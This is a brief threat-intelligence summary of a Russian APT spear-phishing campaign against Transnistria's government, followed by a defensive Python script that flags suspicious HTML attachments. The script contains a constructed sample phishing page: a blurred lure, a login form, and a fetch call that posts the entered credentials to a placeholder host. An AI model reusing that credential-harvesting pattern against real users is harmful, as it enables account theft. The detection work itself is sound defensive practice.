A Russian APT group has launched a sophisticated credential harvesting campaign targeting Transnistria’s governing body using disguised official emails and malicious HTML attachments. The operation forms part of a broader espionage effort focused on European and NATO-aligned entities. #RussianAPT #Transnistria
Keypoints
- The attack began on December 5, 2025, employing spear-phishing emails impersonating presidential orders.
- The malicious HTML attachments embed a blurred document and require the user to log in, which facilitates credential theft.
- The phishing site uses complex JavaScript validation, yet it captures the entered data regardless of password complexity.
- The campaign targets multiple European countries, NATO entities, and diplomatic missions, indicating widespread espionage activity.
- The threat relies on common web technologies and external infrastructure, and it persists across a range of high-value targets in Eastern Europe.
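
For mail-gateway or SOC triage, the traits listed above (blurred lure, login prompt, script sending data to external infrastructure) can be checked statically in an HTML attachment. The following is an added example, not code from the campaign or the original report; the sample HTML, the host `collector.example` and the names `triage` and `AttachmentScan` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment (not from the campaign): blurred lure image,
# login form, and a script that posts the form to a placeholder external host.
SAMPLE = """<html><head><style>#doc { filter: blur(6px); }</style></head><body>
<img id="doc" src="data:image/png;base64,AAAA">
<form id="login"><input type="email" name="u">
<input type="password" name="p"><button>View document</button></form>
<script>
document.getElementById('login').onsubmit = function (e) {
  e.preventDefault();
  fetch('https://collector.example/submit', {method: 'POST', body: new FormData(this)});
};
</script></body></html>"""

BLUR_RE = re.compile(r"filter\s*:\s*[^;}]*blur\s*\(", re.I)  # CSS blur filter
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)           # absolute URLs

class AttachmentScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.blur, self.password_field, self.hosts = False, False, set()
        self._in = None  # "script" or "style" while inside that element

    def _urls(self, text):
        for url in URL_RE.findall(text):
            try:
                host = urlparse(url).hostname
            except ValueError:  # malformed URL, e.g. broken IPv6 literal
                continue
            if host:
                self.hosts.add(host)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style"):
            self._in = tag
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True
        if BLUR_RE.search(a.get("style") or ""):
            self.blur = True
        self._urls((a.get("action") or "") + " " + (a.get("src") or ""))

    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None

    def handle_data(self, data):
        if self._in == "style" and BLUR_RE.search(data):
            self.blur = True
        elif self._in == "script":
            self._urls(data)

def triage(html_text):
    """Return the three indicators and a combined verdict for one attachment."""
    s = AttachmentScan()
    s.feed(html_text)
    s.close()
    hit = s.blur and s.password_field and bool(s.hosts)
    return {"blurred_lure": s.blur, "password_field": s.password_field,
            "external_hosts": sorted(s.hosts), "suspicious": hit}
```

The verdict is a heuristic for queueing attachments for analyst review; obfuscated or dynamically built URLs will not be caught by the static URL pattern.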